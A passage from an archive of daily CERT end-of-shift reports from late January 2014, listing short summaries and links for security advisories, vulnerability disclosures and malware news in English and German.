that it resolves the vulnerability. This vulnerability could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-030-01 *** Schneider Electric Telvent SAGE RTU DNP3 Improper Input Validation Vulnerability *** --------------------------------------------- This advisory was originally posted to the US-CERT secure portal library on January 06, 2014, and is now being released to the NCCIC/ICS-CERT Web site. Adam Crain of Automatak and independent researchers Chris Sistrunk and Adam Todorski have identified an improper input validation in the Schneider Electric Telvent SAGE 3030 remote terminal unit (RTU). Schneider Electric has produced a patch that mitigates this vulnerability. This vulnerability could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-006-01 *** Moodle - MSA-14-0002: Group constraints lacking in "login as" *** --------------------------------------------- Users were able to log in as a user who in a is not in the same group without the permission to see all groups. --------------------------------------------- https://moodle.org/mod/forum/discuss.php?d=252415 *** TYPO3-PSA-2014-001: Cross-Site Request Forgery Protection in TYPO3 CMS 6.2 *** --------------------------------------------- In TYPO3 CMS, protection against CSRF has been implemented for many important actions (like creating, editing or deleting records) but is still missing in other places (like Extension Manager, file upload, configuration module). The upcoming 6.2 LTS version will finally close this gap and will protect editors or administrators from these kind of attacks. --------------------------------------------- https://typo3.org/teams/security/security-bulletins/psa/typo3-psa-2014-001/ *** Puppet - CVE-2013-6450 - Potential denial of service (daemon crash) via crafted traffic from a TLS 1.2 client. *** --------------------------------------------- The DTLS retransmission implementation in OpenSSL through 0.9.8y and 1.x through 1.0.1e does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context by interfering with packet delivery, related... --------------------------------------------- http://puppetlabs.com/security/cve/cve-2013-6450 *** VU#108062: Lexmark laser printers contain multiple vulnerabilities *** --------------------------------------------- Certain Lexmark devices are vulnerable to unverified password changes and stored cross-site scripting attacks. --------------------------------------------- http://www.kb.cert.org/vuls/id/108062 *** A10 Networks Loadbalancer GET directory traversal *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/90814 *** Check Point Endpoint Security MI Server Certificate Validation Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1029704 *** Bugtraq: [SECURITY] [DSA 2849-1] curl security update *** --------------------------------------------- http://www.securityfocus.com/archive/1/530910 *** Bugtraq: Joomla! JomSocial component < 3.1.0.1 - Remote code execution *** --------------------------------------------- http://www.securityfocus.com/archive/1/530909 *** Joomla! JV Comment Component "id" SQL Injection Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56588 *** Vuln: OpenStack Compute (Nova) Compressed qcow2 Disk Images Denial of Service Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/63467

1 0

Tageszusammenfassung - Donnerstag 30-01-2014
by Daily end-of-shift report 30 Jan '14

30 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 29-01-2014 18:00 − Donnerstag 30-01-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** New Clues in the Target Breach *** --------------------------------------------- An examination of the malware used in the Target breach suggests that the attackers may have taken advantage of a poorly secured feature built into a widely-used IT management software product that was running on the retailers internal network. --------------------------------------------- http://krebsonsecurity.com/2014/01/new-clues-in-the-target-breach/ *** How to Debug DKIM, (Wed, Jan 29th) *** --------------------------------------------- DKIM is one way to make it easier for other servers to figure out if an e-mail sent on behalf of your domain is spoofed. Your mail server will add a digital signature to each email authenticating the source. This isnt as good a signing the entire e-mail, but it is a useful tool to at least validate the domain used as part of the "From" header. The problem is that DKIM can be tricky to debug. If you have mail rejected, it is useful to be able to manually verify what went wrong. For --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17528 *** Honey Encryption Tricks Hackers with Decryption Deception *** --------------------------------------------- Honey Encryption is an encryption tool in the works that fools an attacker with bogus decrypted data that looks like it could be a plausible guess at an encryption key or password. --------------------------------------------- http://threatpost.com/honey-encryption-tricks-hackers-with-decryption-decep… *** Attacker extorts coveted Twitter username in elaborate social engineering scheme *** --------------------------------------------- Naoki Hiroshima recently relinquished to an attacker a prized possession that he owned since 2007: a very rare Twitter username so coveted that not only have people tried to steal it, but one person offered $50,000 for it. --------------------------------------------- http://www.scmagazine.com//attacker-extorts-coveted-twitter-username-in-ela… *** Security 101 fail: 3G/4G modems expose control panels to hackers *** --------------------------------------------- Embedded kit depressingly riddled with cross-site request forgery vulns, says researcher Vulnerabilities in a number of 3G and 4G USB modems can be exploited to steal login credentials - or rack up victims mobile bills by sending text messages to premium-rate numbers - a security researcher warns. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/01/30/3gmodem_sec… *** Energy: cyber security is crucial for protection against threats for smart grids which are key for energy availability claims EU cyber security Agency in new report *** --------------------------------------------- The EU's cyber security agency ENISA signals that assessing the threats for smart grids is crucial for their protection and is therefore a key element in ensuring energy availability. --------------------------------------------- http://www.enisa.europa.eu/media/press-releases/energy-cyber-security-is-cr… *** Code-Einschleusung durch MediaWiki-Lücke *** --------------------------------------------- In der beliebten Wiki-Software klafft eine kritische Lücke, durch die Angreifer den Server kompromittieren können. Gepatchte Versionen sorgen für Abhilfe. --------------------------------------------- http://www.heise.de/security/meldung/Code-Einschleusung-durch-MediaWiki-Lue… *** Windows-Taskmanager Process Explorer 16 mit Einbindung von VirusTotal *** --------------------------------------------- Die nun erschienene Version 16 des Process Explorer befragt auf Wunsch den web-basierten Multi-Scanner VirusTotal. Dort prüfen rund 50 Virenscanner, ob eine Datei gefährlich ist. --------------------------------------------- http://www.heise.de/security/meldung/Windows-Taskmanager-Process-Explorer-1… *** Critical infrastructure hack data found in public domain *** --------------------------------------------- Data available from mainstream online media - such as blogs, social networking websites, and specialist online publications - could be used by malevolent agents to mount a cyber-attack on UK critical national infrastructure (CNI), the findings of an investigative assessment to be presented next week will warn. --------------------------------------------- http://eandt.theiet.org/news/2014/jan/ics-security.cfm *** Pidgin Multiple Vulnerabilities *** --------------------------------------------- Multiple vulnerabilities have been reported in Pidgin, which can be exploited by malicious people to compromise a user's system. --------------------------------------------- https://secunia.com/advisories/56693 *** Bugtraq: SimplyShare v1.4 iOS - Multiple Web Vulnerabilities *** --------------------------------------------- The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official SimplyShare v1.4 iOS mobile application. --------------------------------------------- http://www.securityfocus.com/archive/1/530906 *** OTRS Security Advisory 2014-01 - CSRF issue in customer web interface *** --------------------------------------------- An attacker that managed to take over the session of a logged in customer could create tickets and/or send follow-ups to existing tickets due to missing challenge token checks. --------------------------------------------- https://www.otrs.com/security-advisory-2014-01-csrf-issue-customer-web-inte… *** OTRS Security Advisory 2014-02 - SQL injection issue *** --------------------------------------------- Affected by this vulnerability are all releases of OTRS 3.1.x up to and including 3.1.18, 3.2.x up to and including 3.2.13 and 3.3.x up to and including 3.3.3. --------------------------------------------- https://www.otrs.com/security-advisory-2014-02-sql-injection-issue/ *** VLC Media Player RTSP Processing "parseRTSPRequestString()" Buffer Overflow Vulnerability *** --------------------------------------------- A vulnerability has been discovered in VLC Media Player, which can be exploited by malicious people to compromise a user's system. --------------------------------------------- https://secunia.com/advisories/56676 *** SA-CONTRIB-2014-007 - Services - Multiple access bypass vulnerabilities *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-007 Project: Services (third-party module) Version: 7.xDate: 2014-January-29 Security risk: Highly critical Exploitable from: Remote Vulnerability: Multiple access bypass vulnerabilitiesDescriptionThis module enables you to expose an API to third party systems using REST, XML-RPC or other protocols.The form API provides a method for developers to submit forms programmatically using the function drupal_form_submit(). During programmatic form submissions, all access... --------------------------------------------- https://drupal.org/node/2184843 *** SA-CONTRIB-2014-008 - Tribune - Cross Site Scripting (XSS) *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-008 Project: Tribune (third-party module)Version: 6.x, 7.xDate: 2014-January-29 Security risk: Moderately critical Exploitable from: Remote Vulnerability: Cross Site Scripting DescriptionA tribune is a type of chatroom.The module doesnt sufficiently filter user provided text from Tribune node titles.This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create a Tribune node. --------------------------------------------- https://drupal.org/node/2184845

1 0

Tageszusammenfassung - Mittwoch 29-01-2014
by Daily end-of-shift report 29 Jan '14

29 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 28-01-2014 18:00 − Mittwoch 29-01-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Introducing ModSecurity Status Reporting *** --------------------------------------------- The Trustwave SpiderLabs Research team is committed to making ModSecurity the best open source WAF possible. To this end, we have deployed Buildbot platforms and revamped regression tests for our different ports to ensure code quality and reliability. But we want to take it even further. The question is, how else can we improve ModSecurity development and support? To best answer that question, we need some basic insight into the ModSecurity user community: How many ModSecurity deployments are... --------------------------------------------- http://blog.spiderlabs.com/2014/01/introducing-modsecurity-status-reporting… *** Defending Against Tor-Using Malware, Part 1 *** --------------------------------------------- In the past few months, the Tor anonymity service as been in the news for various reasons. Perhaps most infamously, it was used by the now-shuttered Silk Road underground marketplace. We delved into the topic of the Deep Web in a white paper titled Deepweb and Cybercrime. In our 2014 predictions, we noted that cybercriminals would go deeper... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/F4F76IP9KP8/ *** Eyeing SpyEye *** --------------------------------------------- Earlier this week, it was announced by the United States Department of Justice that the creator of the notorious SpyEye banking malware, Aleksandr Andreevich Panin (also known as Gribodemon or Harderman), had pleaded guilty before a federal court to charges related to creating and distributing SpyEye. Trend Micro was a key part of this investigation... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/4eIEz-KJvXo/ *** This tool demands access to YOUR ENTIRE DIGITAL LIFE. Is it from GCHQ? No - its by IKEA *** --------------------------------------------- Order a flat-pack kitchen, surrender your HDDs contents If the Target hack - along with all its predecessors - taught us anything, its that the database isnt the vulnerability. Its the data thats the problem. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/01/29/ikea_demand… *** Botnetz nutzt Lücke in alten Java-Versionen *** --------------------------------------------- Sicherheitsexperten haben Schadsoftware entdeckt, die eine vor Monaten geschlossene Java-Lücke ausnutzt, um ein Botnetz aufzubauen. Das Programm läuft auf Windows, Linux und Mac OSX; Abhilfe ist einfach möglich. --------------------------------------------- http://www.heise.de/security/meldung/Botnetz-nutzt-Luecke-in-alten-Java-Ver… *** Cisco Network Time Protocol Distributed Reflective Denial of Service Vulnerability *** --------------------------------------------- A vulnerability in the Network Time Protocol (NTP) package of several Cisco products could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013… *** Cisco Identity Services Engine Cross-Site Scripting Vulnerabilities *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** WordPress WebEngage Plugin Multiple Cross-Site Scripting Vulnerabilities *** --------------------------------------------- Multiple vulnerabilities have been discovered in the WebEngage plugin for WordPress, which can be exploited by malicious people to conduct cross-site scripting attacks. --------------------------------------------- https://secunia.com/advisories/56700

1 0

Tageszusammenfassung - Dienstag 28-01-2014
by Daily end-of-shift report 28 Jan '14

28 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 27-01-2014 18:00 − Dienstag 28-01-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Making Your Printer Say "Feed Me a Kitten" and Also Exfiltrate Sensitive Data *** --------------------------------------------- As of this last release, PJL (HP's Printer Job Language) is now a grown-up Rex::Proto protocol! Since extending a protocol in Metasploit is beyond the scope of this post, we'll just be covering how to use the PoC modules included with the new protocol. Feel free to dig around in lib/rex/proto/pjl*, though! --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/01/23/hacking-p… *** Coordinated malware eradication *** --------------------------------------------- Today, as an industry, we are very effective at disrupting malware families, but those disruptions rarely eradicate them. Instead, the malware families linger on, rearing up again and again to wreak havoc on our customers. To change the game, we need to change the way we work. It is counterproductive when you think about it. The antimalware ecosystem encompasses many strong groups: security vendors, service providers, CERTs, anti-fraud departments, and law enforcement. Each group uses their... --------------------------------------------- https://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-… *** Trustworthy electronic signatures, secure e-Government and trust: the way forward for improving EU citizens' trust in web services, outlined by EU Agency ENISA *** --------------------------------------------- The EU's cyber security Agency, ENISA, is publishing a series of new studies about the current security practices of Trust Service Providers (TSPs) and recommendations for improving cross-border trustworthiness and interoperability for the new regulated TSPs and for e-Government services using them. --------------------------------------------- http://www.enisa.europa.eu/media/press-releases/trustworthy-electronic-sign… *** Android VPN redirect vuln now spotted lurking in Kitkat 4.4 *** --------------------------------------------- Now may be a good time to check this out, says securo-bod Israeli researchers who specialise in ferreting out Android vulns have discovered a new flaw in KitKat 4.4 that allows an attacker to redirect secure VPN traffic to a third-party server. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/01/28/android_vpn… *** File Infectors and ZBOT Team Up, Again *** --------------------------------------------- File infectors and ZBOT don't usually go together, but we recently saw a case where these two kinds of threats did. This particular file infector - PE_PATNOTE.A - appends its code to all executable files on the infected system,... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/n_0oP1-kYzo/ *** Login-Diebstahl: Warnung vor manipuliertem Filezilla-Client *** --------------------------------------------- Avast warnt vor manipulierten Programmversionen des beliebten Filezilla-Clients. Wer die falsche Version des FTP-Programms nutzt, gibt Kriminellen die Zugangsdaten für die verwendeten FTP-Server. Betroffen sind nur Anwender, die Filezilla von der falschen Quelle heruntergeladen haben. --------------------------------------------- http://www.golem.de/news/login-diebstahl-warnung-vor-manipuliertem-filezill… *** Blog: A cross-platform java-bot *** --------------------------------------------- Early this year, we received a malicious Java application for analysis, which turned out to be a multi-platform bot capable of running on Windows, Mac OS and Linux. The bot was written entirely in Java. The attackers used vulnerability CVE-2013-2465 to infect users with the malware. --------------------------------------------- http://www.securelist.com/en/blog/8174/A_cross_platform_java_bot *** DDoS attacks become smarter, faster and more severe *** --------------------------------------------- DDoS attacks will continue to be a serious issue in 2014 - as attackers become more agile and their tools become more sophisticated, according to Radware. Their report was compiled using data from over 300 cases and the Executive Survey consisting of personal interviews with 15 high-ranking security executives. --------------------------------------------- http://www.net-security.org/secworld.php?id=16268 *** Worldwide Infrastructure Security Report *** --------------------------------------------- Arbor's annual Worldwide Infrastructure Security Report offers unique insight from network operators on the front lines in the global battle against network threats. --------------------------------------------- http://www.arbornetworks.com/resources/infrastructure-security-report *** SI6 Networks IPv6 Toolkit *** --------------------------------------------- A security assessment and troubleshooting tool for the IPv6 protocols --------------------------------------------- http://www.si6networks.com/tools/ipv6toolkit/ *** Security Bulletin: Multiple vulnerabilities in IBM QRadar SIEM (CVE-2014-0838, CVE-2014-0835, CVE-2014-0836, CVE-2014-0837) *** --------------------------------------------- Multiple vulnerabilities exist in the AutoUpdate settings page and the AutoUpdate process within the IBM QRadar SIEM that when used together could result in remote code execution. --------------------------------------------- https://www-304.ibm.com/support/docview.wss?uid=swg21663066 *** VU#686662: Fail2ban postfix and cyrus-imap filters contain denial-of-service vulnerabilities *** --------------------------------------------- Fail2ban versions prior to 0.8.11 are susceptible to a denial-of-service attack when a maliciously crafted email address is parsed by the postfix or cyrus-imap filters. If users have not deployed either of these filters then they are not affected. --------------------------------------------- http://www.kb.cert.org/vuls/id/686662 *** VU#863369: Mozilla Thunderbird does not adequately restrict HTML elements in email message content *** --------------------------------------------- Mozilla Thunderbird does not adequately restrict HTML elements in email content, which could allow an attacker to execute arbitrary script when a specially-crafted email message is forwarded or replied to. --------------------------------------------- http://www.kb.cert.org/vuls/id/863369

1 0

Tageszusammenfassung - Montag 27-01-2014
by Daily end-of-shift report 27 Jan '14

27 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 24-01-2014 18:00 − Montag 27-01-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** ModSecurity Advanced Topic of the Week: HMAC Token Protection *** --------------------------------------------- This blog post presents a powerful feature of ModSecurity v2.7 that has been highly under-utilized by most users: HMAC Token Protection. There was a previous blog post written that outlined some usage examples here, however we did not properly demonstrate the protection coverage gained by its usage. Specifically, by using the HMAC Token Protection capabilities of ModSecurity, you can reduce the attack surface of the following attacks/vulnerabilities: Forceful Browsing of Website Content --------------------------------------------- http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/4JiUhR_1fSQ/modsecurit… *** Mitigation of NTP amplification attacks involving Junos *** --------------------------------------------- When an NTP client or server is enabled within the [edit system ntp] hierarchy level of the Junos configuration, REQ_MON_GETLIST and REQ_MON_GETLIST_1 control messages supported by the monlist feature within NTP may allow remote attackers to cause a denial of service. NTP is not enabled in Junos by default. Once NTP is enabled, an attacker can exploit these control messages in two different ways:... --------------------------------------------- http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10613 *** Sicherheitslücke in Pages: Update angeraten *** --------------------------------------------- Nutzer der Mac- und iOS-Version von Pages sollten die neueste Version installieren - eine Sicherheitslücke in älteren Versionen erlaubt unter Umständen das Ausführen von Schadcode. --------------------------------------------- http://www.heise.de/security/meldung/Sicherheitsluecke-in-Pages-Update-ange… *** First Android bootkit has infected 350,000 devices *** --------------------------------------------- January 24, 2014 Russian anti-virus company Doctor Web is warning users about a dangerous Trojan for Android that resides in the memory of infected devices and launches itself early on in the OS loading stage, acting as a bootkit. This allows the Trojan to minimize the possibility that it will be deleted, without tampering with the devices file system. Currently, this malignant program is operating on more than 350,000 mobile devices belonging to users in various countries,... --------------------------------------------- http://news.drweb.com/show/?i=4206&lng=en&c=9 *** Security Advisory-DoS Vulnerability in Eudemon8000E *** --------------------------------------------- Huawei Eudemon8000E firewall allows users to log in to the device using Telnet or SSH. When an attacker sends to the device a mass of TCP packets with special structure, the logging process become slowly and users may be unable to log in to the device (HWNSIRT-2014-0101). --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor… *** Security Bulletin: GSKit certificate chain vulnerability in IBM Security Directory Server and Tivoli Directory Server (CVE-2013-6747) *** --------------------------------------------- A vulnerability has been identified in the GSKit component utilized by IBM Security Directory Server (ISDS) and IBM Tivoli Directory Server (TDS). A malformed certificate chain can cause the ISDS or TDS client application or server process using GSKit to hang or crash. --------------------------------------------- https://www-304.ibm.com/support/docview.wss?uid=swg21662902 *** Security Bulletin: IBM Security SiteProtector System can be affected by a vulnerability in the IBM Java JRE (CVE-2013-5809) *** --------------------------------------------- IBM Security SiteProtector System can be affected by vulnerability in the IBM Java JRE. This vulnerability could allow a remote attacker to affect confidentiality, integrity, and availability by means of unknown vectors related to the Java 2D component. --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21662685 *** Security Bulletin eDiscovery Manager (CVE-2013-5791 and CVE-2013-5763) *** --------------------------------------------- CVE-2013-5791 - CVSS Score: 10 An unspecified vulnerability in Oracle Outside In Technology related to the Outside In Filters component could allow a local attacker to cause a denial of service. CVE-2013-5763 - CVSS Score: 6.8 Oracle Outside In technology is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the OS/2 Metafile parser. By causing a vulnerable application to process a malicious file, a remote attacker... --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21659481 *** Vulnerability Note VU#168751 - Emerson Network Power Avocent MergePoint Unity 2016 KVM switches contain a directory traversal vulnerability *** --------------------------------------------- Emerson Network Power Avocent MergePoint Unity 2016 (MPU2016) KVM switches running firmware version 1.9.16473 and possibly previous versions contain a directory traversal vulnerability. An attacker can use directory traversal to download critical files such as /etc/passwd to obtain the credentials for the device. --------------------------------------------- http://www.kb.cert.org/vuls/id/168751 *** Vulnerability Note VU#105686 - Thecus NAS Server N8800 contains multiple vulnerabilities *** --------------------------------------------- CVE-2013-5667 - Thecus NAS Server N8800 Firmware 5.03.01 get_userid OS Command Injection CVE-2013-5668 - Thecus NAS Server N8800 Firmware 5.03.01 CVE-2013-5669 - Thecus NAS Server N8800 Firmware 5.03.01 plain text administrative password --------------------------------------------- http://www.kb.cert.org/vuls/id/105686 *** Cisco Video Surveillance Operations Manager MySQL Database Insufficient Authentication Controls *** --------------------------------------------- A vulnerability in the configuration of the MySQL database as installed by Cisco Video Surveillance Operations Manager (VSOM) could allow an unauthenticated, remote attacker to access the MySQL database. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Security update available for Adobe Digital Editions *** --------------------------------------------- Adobe has released a security update for Adobe Digital Editions for Windows and Macintosh. This update addresses a vulnerability in the software that could cause the application to crash and potentially allow an attacker to take control of the affected system. --------------------------------------------- http://helpx.adobe.com/security/products/Digital-Editions/apsb14-03.html *** Hitachi Cosminexus Products Multiple Java Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56545 *** Drupal Doubleclick for Publishers Module Slot Names Script Insertion Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56521 *** WordPress SS Downloads Plugin Multiple Cross-Site Scripting Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56532

1 0

Tageszusammenfassung - Freitag 24-01-2014
by Daily end-of-shift report 24 Jan '14

24 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 23-01-2014 18:00 − Freitag 24-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Russische Spione im Tor-Netz enttarnt *** --------------------------------------------- Forscher stießen auf 20 Exit Nodes, welche die HTTPS-Verbindungen von Tor-Nutzern aufzubrechen versuchten. Die meisten davon stammen aus Russland. --------------------------------------------- http://www.heise.de/security/meldung/Russische-Spione-im-Tor-Netz-enttarnt-… *** Bug Exposes IP Cameras, Baby Monitors *** --------------------------------------------- A bug in the software that powers a broad array of Webcams, IP surveillance cameras and baby monitors made by Chinese camera giant Foscam allows anyone with access to the devices Internet address to view live and recorded video footage, KrebsOnSecurity has learned. --------------------------------------------- http://krebsonsecurity.com/2014/01/bug-exposes-ip-cameras-baby-monitors/ *** "Syrian Electronic Army" attackierten Twitter-Account von CNN *** --------------------------------------------- Sender: "Ja, es ist auch uns passiert. CNN-Accounts gehackt" --------------------------------------------- http://derstandard.at/1389858074081 *** 65.000 E-Mail-Konten bei Salzburg AG gehackt *** --------------------------------------------- Bei der Salzburg AG sind die Zugangsdaten von mehr als 65.000 E-Mail- und Internetkonten gehackt worden. Bankdaten seien nicht betroffen, betonte das Unternehmen. Die Hintergründe der Tat sind unklar. User und Kunden üben Kritik. --------------------------------------------- http://news.orf.at/stories/2215391/ *** Angebliche Sicherheitslücke in aktuellem Chrome nicht zu finden *** --------------------------------------------- Ein Fehler in Googles Browser lässt sich mit der aktuellen Version nicht reproduzieren. Google will die Lücke schon vor Längerem geschlossen haben. --------------------------------------------- http://www.heise.de/security/meldung/Angebliche-Sicherheitsluecke-in-aktuel… *** Malicious links for iOS users *** --------------------------------------------- January 23, 2014 Russian anti-virus company Doctor Web is warning iOS device users about a growing number of incidents involving the distribution of links to bogus sites via mobile app advertisements. An iOS user misguided by such fraud can end up subscribed to a pseudo-service and thus lose money from their mobile account. Recently, users of mobile devices running iOS have been encountering advertisements with increasing frequency in the free applications on their smart phones and tablets. Ads --------------------------------------------- http://news.drweb.com/show/?i=4204&lng=en&c=9 *** GE Proficy Multiple Vulnerabilities *** --------------------------------------------- Researchers amisto0x07 and Z0mb1E of Zero Day Initiative (ZDI) have identified two vulnerabilities in the General Electric (GE) Proficy human-machine interface/supervisory control and data acquisition (HMI/SCADA) - CIMPLICITY application. GE has released security advisories, GEIP13-05 and GEIP13-06, to inform customers about these vulnerabilities.These vulnerabilities could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01 *** DSA-2848 mysql-5.5 *** --------------------------------------------- Several issues have been discovered in the MySQL database server. The vulnerabilities are addressed by upgrading MySQL to the new upstream version 5.5.35. Please see the MySQL 5.5 Release Notes and Oracle's Critical Patch Update advisory for further details. --------------------------------------------- http://www.debian.org/security/2014/dsa-2848 *** Bugtraq: [CVE-2014-1607.] Cross Site Scripting(XSS) in Drupal Event calendar module *** --------------------------------------------- Reflected cross-site scripting (XSS) vulnerability in Drupal 7.14 EventCalendar Module, found in eventcalendar/year allows remote attackers to inject arbitrary web scripts or HTML after the inproperly sanitizited Year Parameter. --------------------------------------------- http://www.securityfocus.com/archive/1/530876 *** Cisco TelePresence Video Communication Server Expressway Default SSL Certificate Vulnerability *** --------------------------------------------- A vulnerability in the Cisco TelePresence Video Communication Server (VCS) Expressway could allow an unauthenticated, remote attacker to execute a man-in-the-middle (MITM) attack between one or more affected devices. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…

1 0

Tageszusammenfassung - Donnerstag 23-01-2014
by Daily end-of-shift report 23 Jan '14

23 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 22-01-2014 18:00 − Donnerstag 23-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** SA-CONTRIB-2014-005 - Leaflet - Access bypass *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-005 Project: Leaflet (third-party module) Version: 7.xDate: 2014-January-22 Security risk: Critical Exploitable from: Remote Vulnerability: Access bypass Description The Leaflet module enables you to display an interactive map using the Leaflet library, using entities as map features.The module exposes complete data from entities used as map features to any site visitor with a Javascript inspector (like Firebug). --------------------------------------------- https://drupal.org/node/2179103 *** New Android Malware Steals SMS Messages, Intercepts Calls *** --------------------------------------------- A new strain of Android malware has emerged that masquerades as an Android security app but once installed, can steal text messages and intercept phone calls. --------------------------------------------- http://threatpost.com/new-android-malware-steals-sms-messages-intercepts-ca… *** Official PERL Blogs hacked, 2,924 Author Credentials Leaked by ICR *** --------------------------------------------- The breach has seen 2,924 user account credentials published to quickleak.org as well as the blog having a deface page added but was not obtrusive to the actually website. --------------------------------------------- http://www.cyberwarnews.info/2014/01/22/official-perl-blogs-hacked-2924-aut… *** CrowdStrike Takes On Chinese, Russian Attack Groups in Threat Report *** --------------------------------------------- Russian attackers targeted energy sector targets and a Chinese nexus intrusion group infected foreign embassies with malware using watering hole tactics in 2013, CrowdStrike researchers found in its first-ever Global Threat Report. --------------------------------------------- http://www.securityweek.com/crowdstrike-takes-chinese-russian-attack-groups… *** Outdated energy, water and transport Industrial Control Systems without sufficient cyber security controls require coordinated testing of capability at EU levels, says the EU's cyber security Agency ENISA *** --------------------------------------------- Today, the EU's cyber security Agency ENISA published a new report to give advice regarding the next steps towards coordinated testing of capability of the often outdated Industrial Control Systems (ICS) for European industries. Among the key recommendations is the testing of ICS is a concern for all EU Member States and could be dealt with at EU levels according to ENISA. --------------------------------------------- http://www.enisa.europa.eu/media/press-releases/ics-without-sufficient-cybe… *** Analysis: Spam in December 2013 *** --------------------------------------------- In December, spammers continued to honor the traditions of the season and tried to attract potential customers with a variety of original gift and winter vacation offers, taking advantage of the approaching holidays. --------------------------------------------- http://www.securelist.com/en/analysis/204792323/Spam_in_December_2013 *** Chrome Eavesdropping Exploit Published *** --------------------------------------------- Exploit code has been published for a Google Chrome bug that allows malicious websites granted permission to use a computers microphone for speech recognition to continue listening after a user leaves the website. --------------------------------------------- http://threatpost.com/chrome-eavesdropping-exploit-published/103798

1 0

Tageszusammenfassung - Mittwoch 22-01-2014
by Daily end-of-shift report 22 Jan '14

22 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 21-01-2014 18:00 − Mittwoch 22-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** [2014-01-22] Backdoor account & command injection vulnerabilities in Allnet IP-Cam ALL2281 *** --------------------------------------------- The IP camera Allnet ALL2281 is affected by critical vulnerabilities that allow an attacker to gain access to the webinterface via a backdoor account. Furthermore, executing arbitrary OS commands is possible. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Feodo Tracker kämpft gegen Rechnungs-Spam *** --------------------------------------------- Das Feodo-Botnet beschert Deutschland aktuell massenhaft Viren-Spam – vermeintlich im Namen bekannter Mobilfunkprovider und Banken. Der Feodo-Tracker sammelt Indizien, um das Spam-Netzwerk zu bremsen. --------------------------------------------- http://www.heise.de/security/meldung/Feodo-Tracker-kaempft-gegen-Rechnungs-… *** Security Bulletins: Citrix XenServer Multiple Security Updates *** --------------------------------------------- A number of security vulnerabilities have been identified in Citrix XenServer. These vulnerabilities affect all currently supported versions of Citrix XenServer up to and including Citrix XenServer 6.2 Service Pack 1. The following vulnerabilities have been addressed: CVE-2013-4494, CVE-2013-4554, CVE-2013-6885 --------------------------------------------- http://support.citrix.com/article/CTX140038 *** Security Bulletins: Citrix XenClient XT Multiple Security Updates *** --------------------------------------------- A number of security vulnerabilities have been identified in Citrix XenClient XT. These vulnerabilities affect all currently supported versions of Citrix XenClient XT up to and including version 3.2. The following vulnerabilities have been addressed: CVE-2013-4355, CVE-2013-4370, CVE-2013-4416, CVE-2013-4494, CVE-2013-4554 --------------------------------------------- http://support.citrix.com/article/CTX139624 *** SSL Labs: Stricter security requirements for 2014 *** --------------------------------------------- Today, were releasing a new version of SSL Rating Guide as well as a new version of SSL Test to go with it. Because the SSL/TLS and PKI ecosystem continues to move at a fast pace, we have to periodically evaluate our rating criteria to keep up. --------------------------------------------- http://blog.ivanristic.com/2014/01/ssl-labs-stricter-security-requirements-… *** [2014-01-22] Critical vulnerabilities in T-Mobile HOME NET Router LTE (Huawei B593u-12) *** --------------------------------------------- Attackers are able to completely compromise the T-Mobile Austria HOME NET router (based on Huawei B593u-12) without prior authentication. Depending on the configuration of the router it is also possible to exploit the flaws directly from the Internet. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Digitally signed data-stealing malware targets Mac users in 